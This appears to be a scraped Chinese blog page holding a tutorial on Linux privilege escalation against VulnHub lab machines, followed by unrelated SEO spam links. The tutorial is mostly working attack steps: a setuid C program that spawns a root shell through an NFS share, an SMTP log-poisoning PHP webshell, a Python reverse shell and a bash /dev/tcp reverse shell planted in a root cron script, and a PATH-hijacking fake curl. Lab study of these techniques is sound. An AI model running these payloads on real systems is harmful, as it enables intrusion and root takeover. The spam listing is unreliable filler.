当前位置: 首页 > news >正文

网站站长在哪登陆后台暂时没有域名怎么做网站

网站站长在哪登陆后台,暂时没有域名怎么做网站,wordpress 简书,2015做微网站多少钱一、演示案例-Linux系统提权-Web普通用户-SUID-NFS安全 NFS是一种基于TCP/IP 传输的网络文件系统协议#xff0c;通过使用NFS协议#xff0c;客户机可以像访问本地目录一样访问远程服务器中的共享资源。 https://www.virtualbox.org/wiki/Downloads https://www.vuln…一、演示案例-Linux系统提权-Web普通用户-SUID-NFS安全 NFS是一种基于TCP/IP 传输的网络文件系统协议通过使用NFS协议客户机可以像访问本地目录一样访问远程服务器中的共享资源。 https://www.virtualbox.org/wiki/Downloads https://www.vulnhub.com/entry/hacksudo-2-hackdudo,667/ 前提条件NFS端口服务开启和web或用户权限进行利用 1、信息收集 nmap 192.168.1.6 http://192.168.1.6/file.php?file/etc/passwd 2、NFS服务利用 showmount -e 192.168.1.6 //用于显示NFS网络文件系统服务器上所有已导出的文件系统列表的命令 mkdir nfs  //本地kali创建一个nfs目录 mount -t nfs 192.168.1.6:/mnt/nfs ./nfs  //把目标的/mnt/nfs目录跟kali本地的nfs目录进行同步 3、配合SUID提权 find / -perm -us -type f 2/dev/null  //查看本地suid权限的文件 两种解决方式1、找一个与目标版本相似的系统上传这个系统的find 2、找一个与目标版本相似的系统自己写一个c语言去调用命令 getroot.c #includestdlib.h #includeunistd.h int main() { setuid(0); system(id); system(/bin/bash); } gcc getroot.c -o getroot //把getroot.c编译为getroot可执行文件 cp getroot /root/nfs  //复制bash到挂载目录下 chmod 777 getroot //赋予777权限 chmod s getroot   //赋予suid权限 find / -perm -us -type f 2/dev/null //使用查看当前suid权限看看是否有/mnt/nfs/getroot文件 cd /mnt/nfs     //目标机来到/mnt/nfs目录下 ./getroot       //目标机执行getroot文件触发shell python -c import pty; pty.spawn(/bin/bash)  //python起一个交互式终端 getroot.c #includestdlib.h #includeunistd.h int main() { setuid(0); system(id); system(whoami);  //whoami就是要执行的命令 } 二、演示案例-Linux系统提权-普通用户-SUID-PATH变量 复现环境symfonos: 1 ~ VulnHub 前提条件存在SUID的应用中能执行额外命令加用户权限 1、信息收集 smbclient -L 192.168.139.153 2、权限获取 smbclient //192.168.139.153/anonymous smbclient //192.168.139.153/helios -U helios helios \ qwerty 3、漏洞利用 wpscan --url http://192.168.139.153/h3l105/ --plugins-detection aggressive searchsploit mail masta 1.0  //利用searchsploit搜索mail漏洞或者百度关键字 http://192.168.139.153/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl/etc/passwd telnet 192.168.139.153 25 MAIL FROM: MALABIS RCPT TO: helios data ?php system($_GET[shell]); ? . QUIT http://192.168.139.153/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl/var/mail/heliosshell python -c import socket,subprocess,os;ssocket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((192.168.139.128,8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);psubprocess.call([/bin/sh,-i]); 4、权限提升 python -c import pty;pty.spawn(/bin/bash)  //python起一个交互终端 find / -perm -us -type f 2/dev/null  //查看当前环境suid strings /opt/statuscheck  //查看这个文件的内容寻找有用信息 cd /tmp echo /bin/sh curl chmod 777 curl export PATH/tmp:$PATH echo $PATH /opt/statuscheck 三、演示案例-Linux系统提权-Web普通用户-Cron计划任务 复现环境Jarbas: 1 ~ VulnHub 1、信息收集 http://192.168.139.152/access.html 2、权限获取 http://192.168.139.152:8080/ 3、权限提升 cat /etc/crontab //查看当前服务器的计划任务 ls -lia /etc/script/CleaningScript.sh  //查看对该任务文件的权限 echo /bin/bash -i /dev/tcp/192.168.139.141/66 01 /etc/script/CleaningScript.sh //把反弹shell命令写进这个文件里 cat /etc/script/CleaningScript.sh   //查看脚本内容
http://www.w-s-a.com/news/385013/

相关文章:

  • 卡盟网站是怎么建设的用花生壳做网站速度可以吗
  • 杭州物联网前十名公司优秀seo平台
  • 网新中英企业网站管理系统wordpress 登录 缓存
  • wordpress模板建站教程wordpress添加广告位手机自适应
  • h5游戏平台入口优化是什么梗
  • 建设银行对公网站打不开网络推广活动方案主题和思路
  • 茶叶网站开发目的和意义网页设计需要考什么证
  • 高端企业网站建设公司怎么做实用性建设网站都需要哪些
  • 网站备案必须要幕布吗易企秀网站怎么做轮播图
  • 南昌网站排名优化四线城市网站建设方向及营利点
  • 做网站需要钱吗unity 做网站
  • 呼伦贝尔市规划建设局网站wordpress怎么考别人的
  • 免备案自助建站网站成都神速建站
  • 怎样编写app软件快速刷排名seo软件
  • 江苏做家纺的公司网站宣传型企业网站
  • 网站网上商城建设外国一些做环保袋的网站
  • 做空气开关那个网站推广比较好建站技术有哪些
  • 做网站前需要做什么准备wordpress图片云储存
  • 查楼盘剩余房源的网站地方网站推广
  • 农家乐网站建设方案创意平面设计公司简介
  • 信息化建设 网站作用网络营销的形式网站营销
  • 沈阳出名网站潍坊正规建设网站
  • 计算机软件开发需要学什么沈阳网站关键字优化
  • 关于军队建设网站国内最好的wordpress主题
  • 小视频网站如何建设陪诊app开发
  • 英文网站首页优化国外手机网站源码
  • 网站建设公司如何找客户网站建设应该考虑哪些问题
  • 创新的江苏网站建设wordpress用户绑定手机
  • 自己做网赌网站网站设计者
  • 教育培训网站设计辽宁招标工程信息网